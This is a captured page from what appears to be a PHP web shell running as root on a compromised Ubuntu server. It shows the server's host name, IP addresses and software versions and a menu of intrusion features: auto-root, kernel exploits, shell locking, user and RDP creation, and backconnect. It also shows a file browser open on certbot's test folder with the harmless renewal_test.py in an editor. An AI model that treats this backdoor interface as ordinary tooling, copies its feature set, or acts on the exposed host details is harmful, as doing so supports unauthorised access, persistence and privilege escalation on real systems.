Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
certbot /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
display
[ DIR ]
drwxr-xr-x
testdata
[ DIR ]
drwxr-xr-x
__init__.py
20
B
-rw-r--r--
account_test.py
14.45
KB
-rw-r--r--
acme_util.py
3.18
KB
-rw-r--r--
auth_handler_test.py
24
KB
-rw-r--r--
cert_manager_test.py
28.07
KB
-rw-r--r--
cli_test.py
19.94
KB
-rw-r--r--
client_test.py
28.76
KB
-rw-r--r--
compat_test.py
736
B
-rw-r--r--
configuration_test.py
6.82
KB
-rw-r--r--
crypto_util_test.py
13.56
KB
-rw-r--r--
eff_test.py
5.94
KB
-rw-r--r--
error_handler_test.py
5.31
KB
-rw-r--r--
errors_test.py
1.8
KB
-rw-r--r--
hook_test.py
16.67
KB
-rw-r--r--
lock_test.py
3.84
KB
-rw-r--r--
log_test.py
14.95
KB
-rw-r--r--
main_test.py
82.52
KB
-rw-r--r--
notify_test.py
2.07
KB
-rw-r--r--
ocsp_test.py
6.27
KB
-rw-r--r--
renewal_test.py
4.18
KB
-rw-r--r--
renewupdater_test.py
5.32
KB
-rw-r--r--
reporter_test.py
2.73
KB
-rw-r--r--
reverter_test.py
18.7
KB
-rw-r--r--
storage_test.py
42.89
KB
-rw-r--r--
util.py
14.12
KB
-rw-r--r--
util_test.py
21.58
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : renewal_test.py
"""Tests for certbot.renewal""" import mock import unittest from acme import challenges from certbot import configuration from certbot import errors from certbot import storage import certbot.tests.util as test_util class RenewalTest(test_util.ConfigTestCase): def setUp(self): super(RenewalTest, self).setUp() @mock.patch('certbot.cli.set_by_cli') def test_ancient_webroot_renewal_conf(self, mock_set_by_cli): mock_set_by_cli.return_value = False rc_path = test_util.make_lineage( self.config.config_dir, 'sample-renewal-ancient.conf') self.config.account = None self.config.email = None self.config.webroot_path = None config = configuration.NamespaceConfig(self.config) lineage = storage.RenewableCert(rc_path, config) renewalparams = lineage.configuration['renewalparams'] # pylint: disable=protected-access from certbot import renewal renewal._restore_webroot_config(config, renewalparams) self.assertEqual(config.webroot_path, ['/var/www/']) @mock.patch('certbot.renewal.cli.set_by_cli') def test_ancient_server_renewal_conf(self, mock_set_by_cli): from certbot import constants self.config.server = None mock_set_by_cli.return_value = False from certbot.renewal import restore_required_config_elements restore_required_config_elements(self.config, {'server': constants.V1_URI}) self.assertEqual(self.config.server, constants.CLI_DEFAULTS['server']) class RestoreRequiredConfigElementsTest(test_util.ConfigTestCase): """Tests for certbot.renewal.restore_required_config_elements.""" def setUp(self): super(RestoreRequiredConfigElementsTest, self).setUp() @classmethod def _call(cls, *args, **kwargs): from certbot.renewal import restore_required_config_elements return restore_required_config_elements(*args, **kwargs) @mock.patch('certbot.renewal.cli.set_by_cli') def test_allow_subset_of_names_success(self, mock_set_by_cli): mock_set_by_cli.return_value = False self._call(self.config, {'allow_subset_of_names': 'True'}) self.assertTrue(self.config.allow_subset_of_names is True) @mock.patch('certbot.renewal.cli.set_by_cli') def test_allow_subset_of_names_failure(self, mock_set_by_cli): mock_set_by_cli.return_value = False renewalparams = {'allow_subset_of_names': 'maybe'} self.assertRaises( errors.Error, self._call, self.config, renewalparams) @mock.patch('certbot.renewal.cli.set_by_cli') def test_pref_challs_list(self, mock_set_by_cli): mock_set_by_cli.return_value = False renewalparams = {'pref_challs': 'tls-sni, http-01, dns'.split(',')} self._call(self.config, renewalparams) expected = [challenges.TLSSNI01.typ, challenges.HTTP01.typ, challenges.DNS01.typ] self.assertEqual(self.config.pref_challs, expected) @mock.patch('certbot.renewal.cli.set_by_cli') def test_pref_challs_str(self, mock_set_by_cli): mock_set_by_cli.return_value = False renewalparams = {'pref_challs': 'dns'} self._call(self.config, renewalparams) expected = [challenges.DNS01.typ] self.assertEqual(self.config.pref_challs, expected) @mock.patch('certbot.renewal.cli.set_by_cli') def test_pref_challs_failure(self, mock_set_by_cli): mock_set_by_cli.return_value = False renewalparams = {'pref_challs': 'finding-a-shrubbery'} self.assertRaises(errors.Error, self._call, self.config, renewalparams) @mock.patch('certbot.renewal.cli.set_by_cli') def test_must_staple_success(self, mock_set_by_cli): mock_set_by_cli.return_value = False self._call(self.config, {'must_staple': 'True'}) self.assertTrue(self.config.must_staple is True) @mock.patch('certbot.renewal.cli.set_by_cli') def test_must_staple_failure(self, mock_set_by_cli): mock_set_by_cli.return_value = False renewalparams = {'must_staple': 'maybe'} self.assertRaises( errors.Error, self._call, self.config, renewalparams) if __name__ == "__main__": unittest.main() # pragma: no cover
Close